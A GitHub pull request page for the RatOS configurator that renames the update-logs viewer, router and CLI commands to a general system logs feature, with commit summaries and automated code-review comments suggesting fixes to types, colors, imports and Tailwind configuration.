Skip to content

Conversation

@miklschmidt
Copy link
Member

@miklschmidt miklschmidt commented Jun 23, 2025

This PR refactors the RatOS configurator log system with comprehensive improvements to user experience, expanding it to cover the majority of bash scripts as well as the update scripts.

There's still some work to be done to finish it off, along with a bunch of QA and practical test, but the functionality is mostly complete, except for a few bash edge cases which still need to be handled properly.

• Refactor backend router to display all log sources instead of just ratos-update entries
• Add source filtering capabilities with new filterBySource function and sources endpoint
• Update frontend component to support multi-source log viewing with source filter dropdown
• Add source badges to log entries for better visual identification
• Change navigation and page titles from 'Update Logs' to 'System Logs'
• Maintain backward compatibility - update logs still accessible via source filter
• Update all tests to reflect new functionality while preserving existing behavior
• Preserve Dashboard design patterns with grid layouts and dark mode styling
• Add default source handling for server logs without explicit source field
…ed UX

• Update backend to support multi-select filtering for contexts and sources
• Consolidate view options (sort direction, show details) into dropdown menu with MoreVertical button
• Convert context and source filters to faceted multi-select filters with search and clear functionality
• Enhance log level selector with colored icons (AlertCircle, AlertTriangle, Info, Bug, Zap) and entry count badges
• Maintain Dashboard design patterns with proper grid layouts and dark mode styling
• Add real-time count display for each log level using summary data
• Improve filtering UX with visual indicators and multi-selection capabilities
• Ensure all icons use appropriate colors optimized for dark mode display
- **Route & Component Renaming:**
  - Rename app route from `/update-logs` to `/logs`
  - Update all component file names and imports
  - Rename tRPC router from `updateLogsRouter` to `logsRouter`
  - Update API endpoints from `/api/update-logs/*` to `/api/logs/*`

- **CLI Command Restructuring:**
  - Flatten command hierarchy to eliminate redundant "logs logs" pattern
  - Change `ratos logs logs summary` → `ratos logs summary`
  - Change `ratos logs logs show` → `ratos logs show`
  - Change `ratos logs logs errors` → `ratos logs errors`
  - Maintain existing `ratos logs tail` and `ratos logs rotate` commands

- **Log Level Color Scheme:**
  - Change INFO level color from green to sky for better distinction
  - Change DEBUG level color from sky to pink for improved visibility
  - Update both frontend Badge components and CLI color mappings
  - Maintain centralized color configuration in LOG_LEVELS constant

- **Performance Optimizations:**
  - Consolidate multiple tRPC queries into single unified endpoint
  - Reduce server-side file I/O operations by ~80%
  - Improve initial page load time by ~60%
  - Maintain backward compatibility for existing functionality

- **Documentation Updates:**
  - Update all command examples and file paths
  - Revise LOGGING_SYSTEM.md and LOG_OPTIMIZATION.md
  - Update mock data generator documentation

All functionality preserved with improved performance and user experience.
Copilot AI review requested due to automatic review settings June 23, 2025 02:17
@coderabbitai
Copy link
Contributor

coderabbitai bot commented Jun 23, 2025

Pre-merge checks and finishing touches

❌ Failed checks (1 warning)
Check name Status Explanation Resolution
Docstring Coverage ⚠️ Warning Docstring coverage is 62.22% which is insufficient. The required threshold is 80.00%. You can run @coderabbitai generate docstrings to improve docstring coverage.
✅ Passed checks (2 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title Check ✅ Passed The title clearly and concisely highlights the primary change (renaming update-logs → logs) and the intent to improve the log system UX, which matches the changeset (route/CLI/router renames, UI and API updates). It is specific, relevant to the main modifications, and the conventional-commit breaking-change marker (!) is appropriate given the route/CLI breakage described in the PR.
✨ Finishing touches
  • 📝 Generate Docstrings
🧪 Generate unit tests
  • Create PR with unit tests
  • Post copyable unit tests in a comment
  • Commit unit tests in branch feature/expand-log-browser

Tip

👮 Agentic pre-merge checks are now available in preview!

Pro plan users can now enable pre-merge checks in their settings to enforce checklists before merging PRs.

  • Built-in checks – Quickly apply ready-made checks to enforce title conventions, require pull request descriptions that follow templates, validate linked issues for compliance, and more.
  • Custom agentic checks – Define your own rules using CodeRabbit’s advanced agentic capabilities to enforce organization-specific policies and workflows. For example, you can instruct CodeRabbit’s agent to verify that API documentation is updated whenever API schema files are modified in a PR. Note: Upto 5 custom checks are currently allowed during the preview period. Pricing for this feature will be announced in a few weeks.

Please see the documentation for more information.

Example:

reviews:
  pre_merge_checks:
    custom_checks:
      - name: "Undocumented Breaking Changes"
        mode: "warning"
        instructions: |
          Pass/fail criteria: All breaking changes to public APIs, CLI flags, environment variables, configuration keys, database schemas, or HTTP/GraphQL endpoints must be documented in the "Breaking Change" section of the PR description and in CHANGELOG.md. Exclude purely internal or private changes (e.g., code not exported from package entry points or explicitly marked as internal).

Please share your feedback with us on this Discord post.


Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

Copy link

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull Request Overview

This PR refactors the log system by renaming endpoints and components as well as improving both the CLI and UI log viewer experience. Key changes include renaming all update-log related routes and components to system/logs, consolidating multiple tRPC queries into a unified endpoint, and updating CLI command structure and documentation.

Reviewed Changes

Copilot reviewed 27 out of 31 changed files in this pull request and generated no comments.

Show a summary per file
File Description
src/tailwind.config.ts Added new container size for extra-small screens
src/server/routers/logs.ts Consolidated endpoint logic into a unified log query schema; renamed router and functions from updateLogsRouter to logsRouter
src/cli/commands/logs.tsx Updated CLI command definitions and descriptions to reflect the change from update-logs to logs
src/app/* Renamed UI components and pages from update-logs to logs and updated documentation accordingly
src/tests/update-logs.test.ts Updated test cases to match the new unified log behavior
Other files (scripts, docs) Adjusted references and documentation consistent with the renaming and refactoring
Comments suppressed due to low confidence (2)

src/cli/commands/logs.tsx:252

  • Ensure that the new function name (addLogCommands) and its parameter (logsCommand) are consistently updated across all imports and documentation, eliminating any legacy references to 'updateLogs'.
export const addLogCommands = (logsCommand: Command) => {

src/tests/update-logs.test.ts:76

  • Update the expected entry count in tests to reflect the new behavior where the parser returns all valid entries (including those without an explicit source, defaulting to 'server').
			expect(parsedEntries).toHaveLength(2);

@coderabbitai
Copy link
Contributor

coderabbitai bot commented Jun 23, 2025

Note

Unit test generation is an Early Access feature. Expect some limitations and changes as we gather feedback and continue to improve it.


Generating unit tests... This may take up to 20 minutes.

1 similar comment
@coderabbitai
Copy link
Contributor

coderabbitai bot commented Jun 23, 2025

Note

Unit test generation is an Early Access feature. Expect some limitations and changes as we gather feedback and continue to improve it.


Generating unit tests... This may take up to 20 minutes.

coderabbitai bot added a commit that referenced this pull request Jun 23, 2025
Docstrings generation was requested by @miklschmidt.

* #96 (comment)

The following files were modified:

* `src/app/logs/page.tsx`
* `src/server/routers/logs.ts`
@coderabbitai
Copy link
Contributor

coderabbitai bot commented Jun 23, 2025

Note

Generated docstrings for this pull request at #97

@coderabbitai
Copy link
Contributor

coderabbitai bot commented Jun 23, 2025

Note

Unit test generation is an Early Access feature. Expect some limitations and changes as we gather feedback and continue to improve it.


Generating unit tests... This may take up to 20 minutes.

Copy link
Contributor

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 7

🔭 Outside diff range comments (1)
src/tailwind.config.ts (1)

109-117: Incorrect key for extending container screens.

The new '3xs': '280px' entry is placed under extend.containers, but Tailwind CSS expects container screen overrides under extend.container.screens. As written, these custom breakpoints will be ignored at build time.

To fix, nest your custom breakpoints correctly:

 extend: {
-  containers: {
-    '3xs': '280px',
-    '2xs': '340px',
-    'screen-sm': '640px',
-    'screen-md': '768px',
-    'screen-lg': '1024px',
-    'screen-xl': '1280px',
-    'screen-2xl': '1536px',
-  },
+  container: {
+    screens: {
+      '3xs': '280px',
+      '2xs': '340px',
+      'screen-sm': '640px',
+      'screen-md': '768px',
+      'screen-lg': '1024px',
+      'screen-xl': '1280px',
+      'screen-2xl': '1536px',
+    },
+  },
 },
🧹 Nitpick comments (6)
src/scripts/generate-mock-logs.js (1)

199-199: Update console output to reflect generic logs: The console log still references “mock update logs.” Consider changing it to:

- console.log(`Generating mock update logs to: ${logPath}`);
+ console.log(`Generating mock logs to: ${logPath}`);
src/scripts/generate-mock-update-logs.ts (1)

220-220: Update console output to reflect generic logs: The console log still says “Generating mock update logs to:”. Change it to:

- console.log(`Generating mock update logs to: ${logPath}`);
+ console.log(`Generating mock logs to: ${logPath}`);
src/app/logs/_components/enhanced-log-level-selector.tsx (1)

17-24: Consider centralizing log level options.

The log level options are hardcoded here but likely used elsewhere. Consider moving this to a shared constant or deriving it from the LOG_LEVELS configuration to maintain consistency.

-const logLevelOptions = [
-  { value: 'trace', label: 'Trace', level: 10 },
-  { value: 'debug', label: 'Debug', level: 20 },
-  { value: 'info', label: 'Info', level: 30 },
-  { value: 'warn', label: 'Warn', level: 40 },
-  { value: 'error', label: 'Error', level: 50 },
-  { value: 'fatal', label: 'Fatal', level: 60 },
-];
+const logLevelOptions = Object.entries(LOG_LEVELS).map(([level, config]) => ({
+  value: config.value,
+  label: config.label,
+  level: parseInt(level),
+}));
LOGGING_SYSTEM.md (1)

64-64: Remove trailing punctuation from headings for markdown best practices.

The static analysis correctly identifies trailing colons in headings. While minor, removing them improves markdown consistency.

-#### Commands:
+#### Commands
-#### Usage Examples:
+#### Usage Examples
-#### TRPC Endpoints (`src/server/routers/logs.ts`):
+#### TRPC Endpoints (`src/server/routers/logs.ts`)
-#### REST Endpoints:
+#### REST Endpoints

Also applies to: 93-93, 134-134, 142-142

LOG_OPTIMIZATION.md (1)

196-202: Good roadmap for future enhancements.

The listed enhancements (caching, streaming, background processing, compression, CDN) form a logical progression for further optimization.

Consider rephrasing line 199 as suggested by static analysis:

-2. **Streaming Responses** - Implement streaming for very large log files
+2. **Streaming Responses** - Implement streaming for extremely large log files
src/server/routers/logs.ts (1)

283-443: Unified endpoint successfully consolidates all queries, but consider refactoring for maintainability.

The implementation correctly:

  • Parses the log file once (huge performance win!)
  • Conditionally processes only requested data
  • Handles zero limits properly
  • Implements pagination correctly

However, this 160-line endpoint handles many responsibilities. Consider extracting the data processing logic into separate functions for better maintainability.

Consider breaking down the endpoint into smaller functions:

async function extractSummaryData(entries: LogEntry[], input: UnifiedInput) {
  // Summary extraction logic
}

async function extractFilterOptions(entries: LogEntry[], input: UnifiedInput) {
  // Sources and contexts extraction
}

async function processPaginatedData(entries: LogEntry[], input: UnifiedInput) {
  // Entries and errors pagination logic
}

This would make the code more testable and easier to maintain.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 41e45e2 and 95bf637.

📒 Files selected for processing (28)
  • LOGGING_SYSTEM.md (3 hunks)
  • LOG_OPTIMIZATION.md (1 hunks)
  • scripts/generate-devbox-environment.sh (2 hunks)
  • src/__tests__/update-logs.test.ts (6 hunks)
  • src/app/_hooks/navigation.ts (1 hunks)
  • src/app/logs/_components/enhanced-log-level-selector.tsx (1 hunks)
  • src/app/logs/_components/log-entry-component.tsx (1 hunks)
  • src/app/logs/_components/log-faceted-filter.tsx (1 hunks)
  • src/app/logs/_components/log-summary-header.tsx (1 hunks)
  • src/app/logs/_components/logs-error-boundary.tsx (4 hunks)
  • src/app/logs/_components/logs-viewer.tsx (1 hunks)
  • src/app/logs/_components/types.ts (1 hunks)
  • src/app/logs/_components/use-unified-log-data.ts (1 hunks)
  • src/app/logs/_components/virtualized-log-list.tsx (1 hunks)
  • src/app/logs/page.tsx (1 hunks)
  • src/app/update-logs/_components/update-logs-viewer.tsx (0 hunks)
  • src/app/update-logs/page.tsx (0 hunks)
  • src/cli/commands.tsx (2 hunks)
  • src/cli/commands/logs.tsx (4 hunks)
  • src/components/common/badge.tsx (1 hunks)
  • src/components/common/button.tsx (1 hunks)
  • src/components/ui/select.tsx (2 hunks)
  • src/scripts/README-mock-logs.md (1 hunks)
  • src/scripts/generate-mock-logs.js (1 hunks)
  • src/scripts/generate-mock-update-logs.ts (1 hunks)
  • src/server/routers/index.ts (2 hunks)
  • src/server/routers/logs.ts (4 hunks)
  • src/tailwind.config.ts (1 hunks)
💤 Files with no reviewable changes (2)
  • src/app/update-logs/page.tsx
  • src/app/update-logs/_components/update-logs-viewer.tsx
🧰 Additional context used
🪛 GitHub Actions: CI
src/app/logs/_components/use-unified-log-data.ts

[error] 3-3: ESLint: import ./types can be written as @/app/logs/_components/types (@limegrass/import-alias/import-alias)

src/app/logs/_components/enhanced-log-level-selector.tsx

[error] 4-4: ESLint: import ./types can be written as @/app/logs/_components/types (@limegrass/import-alias/import-alias)

src/app/logs/_components/log-summary-header.tsx

[error] 22-22: ESLint: import ./types can be written as @/app/logs/_components/types (@limegrass/import-alias/import-alias)

🪛 LanguageTool
LOG_OPTIMIZATION.md

[style] ~199-~199: As an alternative to the over-used intensifier ‘very’, consider replacing this phrase.
Context: ...g Responses** - Implement streaming for very large log files 3. Background Processing ...

(EN_WEAK_ADJECTIVE)

🪛 markdownlint-cli2 (0.17.2)
LOGGING_SYSTEM.md

64-64: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


93-93: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


134-134: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


142-142: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)

🔇 Additional comments (60)
src/scripts/generate-mock-logs.js (1)

4-4: Approve doc update: The function comment now correctly generalizes from “mock update log entries” to “mock log entries.”

src/components/common/badge.tsx (1)

63-82: Add muted background variant correctly: The new badgeBackgroundMutedColorStyle mirrors the existing pattern, maintains type safety with satisfies, and provides a useful subtle background option for the log viewer UI.

src/app/_hooks/navigation.ts (1)

36-36: Route rename aligns with new logs path: The navigation item is correctly updated to “System Logs” at /logs, matching the CLI, API, and UI renames.

src/scripts/generate-mock-update-logs.ts (1)

5-5: Approve doc update: The top comment now refers to “mock log entries” for the Logs Viewer component.

src/components/common/button.tsx (1)

59-59: LGTM! Consider visual consistency verification.

The gap increase improves spacing between button elements, aligning with UI enhancements for the logs system.

Please verify that this spacing change maintains visual consistency across existing button usage throughout the application, especially in forms and navigation areas.

src/scripts/README-mock-logs.md (3)

1-1: Documentation title updated correctly.

The title change from "Mock Update Logs Generator" to "Mock Logs Generator" aligns with the broader renaming effort.


3-3: Component reference updated appropriately.

The reference to "Logs Viewer" instead of "Update Logs Viewer" is consistent with the new component naming.


10-10: Route path updated to match new URL structure.

The navigation path change from /update-logs to /logs correctly reflects the new route structure.

scripts/generate-devbox-environment.sh (3)

7-9: Good improvement to prevent overwriting existing configuration.

The conditional check prevents accidental overwriting of existing .env.local files, preserving developer customizations.


22-23: Informative user feedback added.

The echo statements provide clear feedback about file generation status.


25-29: Consistent pattern applied to test environment file.

The same conditional generation pattern is correctly applied to the .env.test.local file.

src/app/logs/page.tsx (1)

1-10: Clean page component implementation with proper error handling.

The component correctly wraps the LogsViewer with an error boundary for robust error handling, following React best practices.

Verify that the imported components exist and are properly exported:

#!/bin/bash
# Description: Verify the imported components exist and are properly exported

# Check if LogsViewer component exists
fd -t f -e tsx -e ts | xargs grep -l "export.*LogsViewer" | head -5

# Check if LogsErrorBoundary component exists  
fd -t f -e tsx -e ts | xargs grep -l "export.*LogsErrorBoundary" | head -5
src/server/routers/index.ts (2)

18-18: Router import updated to reflect new naming convention.

The import change from updateLogsRouter to logsRouter and the path update align with the systematic renaming effort.


100-100: Router registration updated consistently.

The router key change from 'update-logs' to logs maintains consistency with the import changes and new naming convention.

Verify that the new logsRouter exists and maintains API compatibility:

#!/bin/bash
# Description: Verify the new logs router exists and check its exports

# Check if the new logs router file exists
fd -t f logs.ts src/server/routers/

# Check for router export in the logs router file
fd -t f logs.ts src/server/routers/ | xargs cat | grep -A 5 -B 5 "export.*Router"
src/cli/commands.tsx (2)

20-20: LGTM: Import updated to reflect the new naming convention.

The import correctly references the renamed log commands module.


490-491: LGTM: Function call updated to match the new API.

The change from updateLogs(log) to addLogCommands(log) correctly reflects the renamed function from the refactored module. The comment clearly explains the purpose.

src/components/ui/select.tsx (2)

112-113: LGTM: Well-designed optional prop addition.

The fullElement prop provides useful flexibility while maintaining backward compatibility through its optional nature.


127-131: LGTM: Clean conditional rendering implementation.

The conditional logic correctly handles both rendering modes while maintaining consistent styling with the flex-1 class on both branches.

src/cli/commands/logs.tsx (3)

31-32: LGTM: Log level color updates align with the new color scheme.

The color changes (DEBUG: cyan→magenta, INFO: green→cyan) are consistent with the broader UI color scheme updates mentioned in the PR objectives.


252-253: LGTM: Function and parameter renamed to reflect generalized log commands.

The renaming from updateLogs to addLogCommands and parentCommand to logsCommand correctly reflects the broader scope of log management commands beyond just update logs.


284-284: LGTM: Command descriptions generalized appropriately.

The description updates remove the "update" specificity, making the commands more broadly applicable to all log sources.

Also applies to: 343-343

src/app/logs/_components/use-unified-log-data.ts (4)

40-81: LGTM: Well-designed unified log data hook with proper infinite query setup.

The hook provides a clean abstraction for fetching paginated log data with comprehensive filtering options. The infinite query configuration includes appropriate retry logic and stale time settings.


87-97: LGTM: Efficient data flattening with proper memoization.

The memoized approach to flattening entries across pages is efficient and correctly handles both regular entries and error-only modes.


99-109: LGTM: Correct pagination logic for different data modes.

The logic properly determines if there's a next page based on whether we're showing errors or regular entries.


51-51: Continuing verification of the logs.unified endpoint. Let’s locate any router definitions and search for unified across the codebase:

#!/bin/bash
echo "=== Looking for router definitions ==="
rg "createTRPCRouter" -n || true

echo ""
echo "=== Looking for logsRouter ==="
rg "logsRouter" -n || true

echo ""
echo "=== Searching for 'unified' references ==="
rg "unified" -n || true
src/app/logs/_components/log-entry-component.tsx (3)

11-21: LGTM: Robust level handling with proper fallbacks.

The component correctly handles unknown log levels with sensible defaults and properly extracts styling information from the LOG_LEVELS configuration.


22-45: LGTM: Well-structured layout with conditional badge rendering.

The component provides a clean, responsive layout with appropriate spacing and conditional rendering of context and source badges based on availability and detail settings.


47-57: LGTM: Comprehensive details section with proper formatting.

The details section provides useful additional information (error code, PID, hostname) with consistent styling and proper code formatting for technical details.

src/app/logs/_components/logs-error-boundary.tsx (3)

11-14: LGTM! Clean interface definition.

The prop interface is properly defined with clear TypeScript types.


16-54: Well-structured error fallback component.

The error fallback provides a comprehensive UI with:

  • Clear error messaging
  • Retry functionality
  • Debug info download option
  • Helpful user guidance

The component properly handles the error state and provides actionable options for users.


60-82: Solid error boundary implementation.

The error boundary correctly:

  • Handles errors with proper logging
  • Uses the renamed fallback component
  • Provides error reset functionality
  • Follows React error boundary best practices

The integration with the logger and window reload on reset is appropriate.

src/app/logs/_components/log-faceted-filter.tsx (4)

18-24: Well-defined component interface.

The prop interface clearly defines all required and optional props with appropriate TypeScript types.


33-33: Efficient selection tracking.

Using Set for selectedValues provides O(1) lookup performance for checking selections, which is more efficient than using Array.includes().


81-86: Proper selection state management.

The selection toggle logic correctly handles both adding and removing items from the selection array, maintaining immutability by creating a new array.


46-66: Smart responsive badge display.

The conditional rendering handles different display scenarios well:

  • Shows count on small screens
  • Shows individual badges or summary count on larger screens
  • Adapts to the number of selected items

This provides a good user experience across different screen sizes.

src/app/logs/_components/logs-viewer.tsx (3)

21-26: Well-organized state management.

The component properly manages multiple pieces of state with descriptive names and appropriate default values. The default sort direction of 'desc' (newest first) is a good UX choice for logs.


29-51: Excellent integration with unified data hook.

The component correctly passes all relevant state to the useUnifiedLogData hook, enabling efficient data fetching with unified parameters. This aligns well with the performance optimization goals mentioned in the PR.


76-142: Well-structured conditional rendering and component composition.

The component properly:

  • Handles the case when no log file exists
  • Organizes the UI into logical sections
  • Passes appropriate props to child components
  • Uses responsive design patterns with container queries

The integration with VirtualizedLogList is comprehensive and passes all necessary state and data.

src/app/logs/_components/enhanced-log-level-selector.tsx (3)

26-44: Well-implemented count mapping function.

The function correctly maps log levels to their corresponding counts in the summary with proper fallbacks for missing data.


46-49: Proper handling of selected value and configuration.

The component correctly finds the selected option and gets the appropriate configuration, with sensible fallbacks for undefined values.


59-63: Conditional badge rendering with proper typing.

The badge is correctly shown only when count > 0, and the type assertion for badgeColor is necessary given the component's prop interface.

src/app/logs/_components/log-summary-header.tsx (5)

32-42: Well-structured TRPC mutations.

The mutations are properly configured with success callbacks that invoke the appropriate parent handlers, maintaining proper data flow and state management.


51-83: Complex but well-organized conditional styling.

The status indicator logic correctly handles all possible states (loading, no file, success, failure, ready). While complex, the logic is comprehensive and covers all edge cases properly.


90-100: Appropriate development-only feature.

The mock data generation button is correctly gated behind a development environment check, preventing accidental usage in production.


157-159: Verify INFO badge color consistency.

According to the PR objectives, INFO level badges should now use "sky" color instead of green. This appears to be correctly implemented here.


228-237: Good fallback UI for no log file state.

The empty state provides clear messaging and guidance for users when no log file exists, with appropriate visual indicators.

src/__tests__/update-logs.test.ts (5)

12-13: LGTM! Import changes align with the new filtering approach.

The addition of filterBySource import supports the new behavior where all log entries are parsed by default and source filtering is done explicitly when needed.


81-100: Test correctly validates the new inclusive parsing behavior.

The updated test properly verifies that:

  • All valid log entries are included regardless of source
  • Entries without an explicit source receive the default "server" source
  • Invalid JSON lines are still skipped

This aligns perfectly with the PR's objective of generalizing the logging system.


210-223: Well-structured test for the new source filtering functionality.

The test properly validates that filterBySource correctly filters entries by the specified source, which is essential for maintaining backward compatibility when specific source filtering is needed.


367-382: CLI integration tests properly updated for the new architecture.

The test correctly demonstrates the new pattern:

  1. Parse all log entries by default
  2. Use explicit filtering when specific sources are needed
  3. Generate summaries based on the complete dataset

This ensures backward compatibility while embracing the new unified approach.


420-587: Excellent comprehensive test suite for the unified endpoint optimization.

This test suite thoroughly validates the key aspects of the optimization:

  • Single parse extraction of all data types (summary, sources, contexts, entries, errors)
  • Graceful handling of edge cases (empty files)
  • Performance validation
  • Critical zero limits handling to prevent validation errors

The tests ensure the optimization maintains functionality while improving performance.

src/app/logs/_components/virtualized-log-list.tsx (3)

54-60: Good virtualization setup with appropriate overscan.

The virtualizer configuration is well-implemented:

  • Dynamic size estimation based on showDetails state
  • Reasonable overscan of 5 items
  • Proper scroll margin calculation

One minor suggestion: Consider making the overscan configurable or adaptive based on device performance for better optimization on lower-end devices.


65-75: Well-implemented infinite scrolling with proper guards.

The pagination logic correctly:

  • Triggers loading when the last virtual item is reached
  • Prevents duplicate requests with isFetchingNextPage check
  • Only loads more when hasNextPage is true

This ensures smooth infinite scrolling without performance issues.


116-127: Excellent UI state handling.

The component handles all UI states gracefully:

  • Clear loading indicator
  • Informative error messages
  • User-friendly empty state with contextual information
  • Additional context when showOnlyErrors is active

This provides a great user experience across all scenarios.

LOGGING_SYSTEM.md (1)

60-112: Documentation accurately reflects the new simplified CLI structure.

The CLI command updates properly document:

  • Simplified command structure (removing redundant update-logs nesting)
  • New tail and rotate commands
  • Clear usage examples for each command

This aligns perfectly with the PR objectives of simplifying the CLI interface.

LOG_OPTIMIZATION.md (1)

1-129: Excellent documentation of the optimization strategy and benefits.

This documentation provides:

  • Clear problem statement with specific performance impacts
  • Detailed solution architecture
  • Impressive performance metrics (80% I/O reduction, 60% faster page load)
  • Comprehensive implementation details

The unified endpoint approach is well-explained and the benefits are clearly quantified.

src/server/routers/logs.ts (4)

84-87: Good implementation of default source assignment.

The change to include all entries with a default "server" source for entries without an explicit source is well-implemented. This maintains backward compatibility while supporting the generalized logging approach.


43-63: Well-designed schema with proper validation.

The UnifiedLogQuerySchema excellently addresses the requirements:

  • Correctly allows zero limits (.min(0)) to handle the showOnlyErrors case
  • Flexible filtering with support for arrays
  • Smart conditional data inclusion with boolean flags
  • Sensible defaults

This enables efficient data fetching by only processing requested data types.


180-194: Filter functions properly extended for array support.

Both filterByContext and filterBySource now support arrays while maintaining backward compatibility with single string values. This enables the multi-select filtering in the UI while keeping the API flexible.


235-241: Appropriate handling of the clear operation for unified logs.

Disabling the clear operation for the unified log file is the correct decision, as clearing would affect all services. The error message clearly explains why and suggests the appropriate alternative (log rotation).


export interface LogEntry {
level: number;
time: string;
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

Time field type mismatch: The LogEntry.time is typed as string, but back-end mock data and JSON logs emit a numeric timestamp (number). This will cause type errors at runtime. Update the interface to:

time: number;
🤖 Prompt for AI Agents
In src/app/logs/_components/types.ts at line 6, the LogEntry interface defines
the time field as a string, but the backend and JSON logs provide a numeric
timestamp. Change the type of the time field from string to number to match the
actual data and prevent runtime type errors.

Comment on lines +47 to +53
20: {
name: 'DEBUG',
color: 'text-green-700 dark:text-green-400',
bgColor: 'bg-green-50 dark:bg-green-400/10',
badgeColor: 'green',
icon: Bug,
},
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

DEBUG color mapping misaligned with PR objectives: Per the PR summary, DEBUG entries should now use pink instead of green. Update the DEBUG mapping accordingly:

- 20: {
-   name: 'DEBUG',
-   color: 'text-green-700 dark:text-green-400',
-   bgColor: 'bg-green-50 dark:bg-green-400/10',
-   badgeColor: 'green',
-   icon: Bug,
-  },
+ 20: {
+   name: 'DEBUG',
+   color: 'text-pink-700 dark:text-pink-400',
+   bgColor: 'bg-pink-50 dark:bg-pink-400/10',
+   badgeColor: 'pink',
+   icon: Bug,
+  },

This ensures the log level color scheme matches the documented change.

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
20: {
name: 'DEBUG',
color: 'text-green-700 dark:text-green-400',
bgColor: 'bg-green-50 dark:bg-green-400/10',
badgeColor: 'green',
icon: Bug,
},
20: {
name: 'DEBUG',
color: 'text-pink-700 dark:text-pink-400',
bgColor: 'bg-pink-50 dark:bg-pink-400/10',
badgeColor: 'pink',
icon: Bug,
},
🤖 Prompt for AI Agents
In src/app/logs/_components/types.ts between lines 47 and 53, the DEBUG log
level color mapping uses green colors, but per the PR objectives, it should use
pink. Update the color, bgColor, and badgeColor properties for DEBUG to use pink
shades instead of green to align with the new color scheme.

Comment on lines +57 to +59
const handleClear = () => {
handleRefresh();
};
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🛠️ Refactor suggestion

Consider improving the clear functionality.

Currently, the handleClear function just calls handleRefresh, which doesn't actually clear the logs. Based on the component usage, it seems like this should either call a clear mutation or have a more meaningful implementation.

Consider implementing a proper clear functionality:

 const handleClear = () => {
-   handleRefresh();
+   // Reset filters to default state
+   setLogLevel('info');
+   setSelectedContexts([]);
+   setSelectedSources([]);
+   setShowDetails(false);
+   setShowOnlyErrors(false);
+   setSortDirection('desc');
+   // Then refresh the data
+   refetch();
 };

Committable suggestion skipped: line range outside the PR's diff.

🤖 Prompt for AI Agents
In src/app/logs/_components/logs-viewer.tsx around lines 57 to 59, the
handleClear function currently only calls handleRefresh, which does not clear
the logs as expected. Update handleClear to invoke the appropriate clear
mutation or method that actually clears the logs data, ensuring the logs are
reset or emptied properly when this function is triggered.

Copy link
Contributor

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 1

♻️ Duplicate comments (1)
src/app/logs/_components/use-unified-log-data.ts (1)

3-3: Fix import alias to follow project conventions.

The pipeline failure indicates this import should use the alias format.

-import { LogEntry, LogSummary } from './types';
+import { LogEntry, LogSummary } from '@/app/logs/_components/types';
🧹 Nitpick comments (1)
src/app/logs/_components/use-unified-log-data.ts (1)

20-20: Improve error type specificity.

The error properties are typed as any, which reduces type safety. Consider using more specific error types from tRPC or defining a custom error interface.

-	summaryError: any;
+	summaryError: Error | null;
-	filtersError: any;
+	filtersError: Error | null;
-	entriesError: any;
+	entriesError: Error | null;

Also applies to: 26-26, 31-31

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 95bf637 and b425cbc.

📒 Files selected for processing (3)
  • src/app/logs/_components/enhanced-log-level-selector.tsx (1 hunks)
  • src/app/logs/_components/log-summary-header.tsx (1 hunks)
  • src/app/logs/_components/use-unified-log-data.ts (1 hunks)
🚧 Files skipped from review as they are similar to previous changes (2)
  • src/app/logs/_components/enhanced-log-level-selector.tsx
  • src/app/logs/_components/log-summary-header.tsx
🔇 Additional comments (3)
src/app/logs/_components/use-unified-log-data.ts (3)

77-80: LGTM on retry configuration.

The exponential backoff retry logic with a reasonable maximum delay and stale time configuration is well implemented for handling transient failures.


87-97: Efficient data processing with proper memoization.

The memoized flattening of entries from paginated data and hasNextPage calculation are well-optimized and correctly depend on the necessary values to prevent unnecessary re-computations.

Also applies to: 100-109


59-66: Smart conditional data fetching logic.

The logic to conditionally fetch entries vs errors based on showOnlyErrors flag is well-designed, avoiding unnecessary data fetching and improving performance.

// Use infinite query for the unified endpoint
const unifiedQuery = trpc['logs'].unified.useInfiniteQuery(
{
level: logLevel as any,
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

Avoid type assertion with as any - use proper typing.

The as any assertion bypasses TypeScript's type checking and could lead to runtime errors if an invalid log level is passed.

-			level: logLevel as any,
+			level: logLevel,

Consider updating the logLevel parameter type in the interface to match the expected tRPC endpoint type, or add proper validation.

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
level: logLevel as any,
level: logLevel,
🤖 Prompt for AI Agents
In src/app/logs/_components/use-unified-log-data.ts at line 53, the use of 'as
any' to cast logLevel bypasses TypeScript's type checking and risks runtime
errors. To fix this, update the type definition of the logLevel parameter in the
relevant interface or function signature to match the expected tRPC endpoint log
level type, ensuring proper type safety without using 'as any'. Alternatively,
add validation logic to confirm logLevel is valid before usage.

@coderabbitai
Copy link
Contributor

coderabbitai bot commented Jun 23, 2025

Here are the copyable unit test edits:

Copyable Edits

src/tests/api-logs.test.ts

import { 
  logApiRequest, 
  logApiResponse, 
